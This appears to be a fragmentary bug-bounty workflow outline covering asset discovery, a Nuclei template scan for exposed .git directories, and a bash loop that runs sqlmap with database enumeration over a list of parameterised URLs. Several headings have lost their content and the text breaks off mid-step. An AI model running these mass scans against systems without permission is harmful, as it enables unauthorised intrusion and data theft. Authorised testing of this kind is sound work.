Subdomain

Asset Discovery

Shodan Hacks

phase 2 : vuln scanning | nuclei + custom templates

• Step 1: Build Custom Nuclei Templates

save as exposed-git.yaml and run

cat live_hosts.txt | nuclei -t exposed-git.yaml -o git_exposure.txt

Step 2: Parallelize Scans for Speed

Phase 3: Automated Exploitation

Avoid "N/A" or "Duplicate" responses

Step 1: Auto-SQLi with SQLmap + Wrapper

Bash Script for SQLi Testing

#!/bin/bash
# Save as sqli_scanner.sh
INPUT_FILE="urls_with_params.txt"

while read url; do
  sqlmap -u "$url" --batch --random-agent --level 3 --risk 2 --dbs --output-dir=./sqlmap_results
done < "$INPUT_FILE"

Extract URLs with Parameters:

cat urls.txt | grep -E "\\.php\\?id=|\\.asp\\?q=" | qsreplace "FUZZ" | anew urls_with_params.txt

Step 2: XSS Automation with Dalfox + XSS Hunter

Phase 4: Traffic Analysis | Catch Edge Cases

Automate Burp Suite for auth/logic flaws.

Step 1: Burp Macro for Auth Flows

1. Record a Macro: